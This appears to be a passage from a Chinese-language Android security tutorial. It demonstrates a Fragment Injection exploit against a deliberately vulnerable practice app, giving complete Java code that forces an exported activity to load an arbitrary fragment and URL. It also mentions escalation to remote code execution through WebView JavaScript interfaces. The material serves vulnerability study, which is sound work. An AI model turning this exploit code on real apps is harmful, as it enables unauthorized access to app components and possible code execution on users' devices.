利用Fragment Injection漏洞对TargetFragment攻击,加载任意 Fragment 攻击的EXP,如下:
- MainActivity.java 代码:
package com.example.testpoc4;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.Toast;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
// 获取控件id
Button button1 = findViewById(R.id.button);
// 监听点击事件
button1.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
// 要执行的操作
Intent intent=new Intent();
intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
//包名 包名+类名(全路径)
intent.setClassName("ddns.android.vuls", "ddns.android.vuls.activities.Activity.FragmentActivity");
intent.putExtra(":android:show_fragment","ddns.android.vuls.activities.Activity.TargetFragment");
intent.setData(Uri.parse("https://orangey.blog.csdn.net"));
startActivity(intent);
//成功加载任意Fragment攻击后的提示
Toast.makeText(MainActivity.this,"加载任意Fragment攻击:成功加载Orangey CSDN博客", Toast.LENGTH_SHORT).show();
Log.d("加载任意Fragment攻击:","成功加载Orangey CSDN博客");
}
});
}
}
- activity_main.xml 代码:
<?xml version="1.0" encoding="utf-8"?>
通过Fragment Injection漏洞,TargetFragment已加载恶意URL,如下:
注:如果Fragment的Webview组件允许webView.addJavascriptInterface漏洞,即可恶意加载恶意JS代码,代表存在远程代码执行漏洞攻击。这个此处就不再演示了,可以前往之前的WebView的文章查看,攻击手法差不多,不再重复讲解
参考链接:
https://segmentfault.com/a/1190000039960026
https://blog.csdn.net/wuyuxing24/article/details/78698633
https://blog.csdn.net/L173864930/article/details/17279165
https://blog.csdn.net/syy0201/article/details/115057633
https://mp.weixin.qq.com/s/BPYjCz2wlkGOijb-sUcrQg
https://wooyun.js.org/drops/Fragment Injection漏洞杂谈.html
